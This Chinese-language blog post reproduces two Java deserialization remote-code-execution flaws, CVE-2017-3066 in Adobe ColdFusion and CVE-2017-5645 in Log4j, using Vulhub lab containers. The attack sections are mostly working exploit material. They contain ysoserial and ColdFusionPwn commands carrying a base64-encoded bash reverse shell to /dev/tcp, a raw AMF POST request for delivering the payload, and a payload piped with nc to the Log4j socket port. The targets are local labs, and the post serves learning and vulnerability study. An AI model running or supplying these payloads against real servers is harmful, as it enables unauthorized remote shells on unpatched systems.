---
title: CVE复现(1)
date: 2020-01-26
tags:
  - RCE 
categories: Web
---

最近特殊时期，还是在家好好学习舒服📝

全是基于Vulhub的复现

https://github.com/vulhub/vulhub

### CVE-2017-3066

- Java
- 反序列化
- RCE

> Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品，其运行的CFML（ColdFusion Markup Language）是针对Web应用的一种程序设计语言。
>
> Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。以下版本受到影响：Adobe ColdFusion (2016 release) Update 3及之前的版本，ColdFusion 11 Update 11及之前的版本，ColdFusion 10 Update 22及之前的版本。

#### 创建环境

```shell
docker-compose up -d
```

默认为8500端口

![image-20200126181239683](CVE复现(1)/image-20200126181239683.png)

访问

```
http://localhost:8500/CFIDE/administrator/index.cfm
```

![image-20200126181314133](CVE复现(1)/image-20200126181314133.png)

密码为vulhub,登陆后

![image-20200126181347514](CVE复现(1)/image-20200126181347514.png)

#### 漏洞利用

https://github.com/codewhitesec/ColdFusionPwn 下载工具

同时需要有**ysoserial**

下载好工具后使用如下命令

```shell
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'bash -c {echo,YmFzaCAtaT4mIC9kZXYvdGNwLzEyNy4wLjAuMS8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}' poc.ser
```

修改base64内容为自己的即可，生成的Payload将会在poc.ser文件中，使用nc进行监听

发送如下数据包

```
POST /flex2gateway/amf HTTP/1.1
Host: 127.0.0.1:8500
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1:8500/CFIDE/administrator/navserver.cfm
Cookie: CFID=1; CFTOKEN=13d40a59d4f91afe-CCF1C8D5-CF27-9D31-67511CD534C67358; CFAUTHORIZATION_cfadmin="YWRtaW4NY2ZhZG1pbg0xNTgwMDMyODExMjI2DUJCRTU1MUI3MUUyNDU5QjU="; CFADMIN_LASTPAGE_ADMIN=%2FCFIDE%2Fadministrator%2Fhomepage%2Ecfm
Upgrade-Insecure-Requests: 1
Content-Type: application/x-amf
Content-Length: 2936

POC
```

POC可以通过Burp的Paste from file 粘贴

![image-20200126181739304](CVE复现(1)/image-20200126181739304.png)

获取shell

![image-20200126181825140](CVE复现(1)/image-20200126181825140.png)

### CVE-2017-5645

- Java
- 反序列化
- RCE

> Apache Log4j是一个用于Java的日志记录库，其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码.

#### 漏洞分析

对 Socket 流中获取的数据没有过滤

Log4j反序列化分析 https://xz.aliyun.com/t/7010 

#### 漏洞利用

```shell
java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaT4mIC9kZXYvdGNwLzEyNy4wLjAuMS8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}" |nc 127.0.0.1 4712
```

![image-20200126182558903](CVE复现(1)/image-20200126182558903.png)

